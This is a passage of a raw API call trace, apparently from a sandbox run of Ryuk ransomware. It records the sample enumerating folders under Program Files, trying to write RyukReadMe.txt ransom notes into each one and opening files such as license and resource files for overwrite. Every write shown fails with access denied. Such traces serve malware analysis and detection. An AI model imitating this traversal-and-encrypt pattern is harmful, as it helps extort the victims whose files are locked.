[0138.197] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.197] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.197] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.197] SetLastError (dwErrCode=0x0) [0138.197] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.197] GetLastError () returned 0x5 [0138.197] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.197] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.197] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d00 [0138.197] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.197] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.197] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.197] SetLastError (dwErrCode=0x0) [0138.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.197] GetLastError () returned 0x5 [0138.197] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.197] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.197] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2d60 [0138.198] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.199] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.199] SetLastError (dwErrCode=0x0) [0138.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.199] GetLastError () returned 0x5 [0138.199] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.199] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.199] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2dc0 [0138.199] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.199] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0138.199] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0138.199] SetLastError (dwErrCode=0x0) [0138.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.199] GetLastError () returned 0x5 [0138.199] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.199] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.199] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.199] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.199] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.199] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.199] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.200] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.200] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.200] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0138.200] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0138.200] SetLastError (dwErrCode=0x0) [0138.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.200] GetLastError () returned 0x5 [0138.200] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.200] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.200] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0138.200] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.200] SetLastError (dwErrCode=0x0) [0138.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.200] GetLastError () returned 0x5 [0138.200] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.200] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.200] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.200] SetLastError (dwErrCode=0x0) [0138.200] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.200] GetLastError () returned 0x5 [0138.200] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.201] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.201] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d00 [0138.201] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.201] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.201] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.201] SetLastError (dwErrCode=0x0) [0138.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.201] GetLastError () returned 0x5 [0138.201] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.201] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.201] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2d60 [0138.201] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.201] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.201] SetLastError (dwErrCode=0x0) [0138.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.201] GetLastError () returned 0x5 [0138.201] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.201] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.201] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2dc0 [0138.202] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.202] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.202] SetLastError (dwErrCode=0x0) [0138.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.202] GetLastError () returned 0x5 [0138.202] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.202] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.202] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e20 [0138.203] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.203] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.203] SetLastError (dwErrCode=0x0) [0138.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.203] GetLastError () returned 0x5 [0138.203] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.203] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.203] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2e80 [0138.203] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.203] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.203] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf", dwFileAttributes=0x80) returned 0 [0138.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\synchronizationeula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.204] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.204] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.204] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.204] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.204] SetLastError (dwErrCode=0x0) [0138.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.204] GetLastError () returned 0x5 [0138.204] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.204] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.204] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0138.204] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.204] SetLastError (dwErrCode=0x0) [0138.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.204] GetLastError () returned 0x5 [0138.204] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.204] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.204] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0138.205] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0138.205] SetLastError (dwErrCode=0x0) [0138.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.205] GetLastError () returned 0x5 [0138.205] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.205] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.205] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.205] SetLastError (dwErrCode=0x0) [0138.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.205] GetLastError () returned 0x5 [0138.205] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.205] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.205] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2dc0 [0138.205] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.205] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.205] SetLastError (dwErrCode=0x0) [0138.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.205] GetLastError () returned 0x5 [0138.205] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.205] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.206] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e20 [0138.207] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.207] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.207] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.207] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.207] SetLastError (dwErrCode=0x0) [0138.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.208] GetLastError () returned 0x5 [0138.208] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.208] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.208] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2e80 [0138.208] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.208] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.208] SetLastError (dwErrCode=0x0) [0138.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.208] GetLastError () returned 0x5 [0138.208] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.208] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.208] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2ee0 [0138.208] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.208] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.208] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\Synchronization.rll", dwFileAttributes=0x80) returned 0 [0138.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\Synchronization.rll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\synchronization.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.209] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.209] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.209] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0138.209] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.209] SetLastError (dwErrCode=0x0) [0138.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.209] GetLastError () returned 0x5 [0138.209] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.209] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.209] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.209] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.209] SetLastError (dwErrCode=0x0) [0138.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.210] GetLastError () returned 0x5 [0138.210] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.210] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.210] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.210] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0138.210] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.210] SetLastError (dwErrCode=0x0) [0138.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.210] GetLastError () returned 0x5 [0138.210] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.210] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.210] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 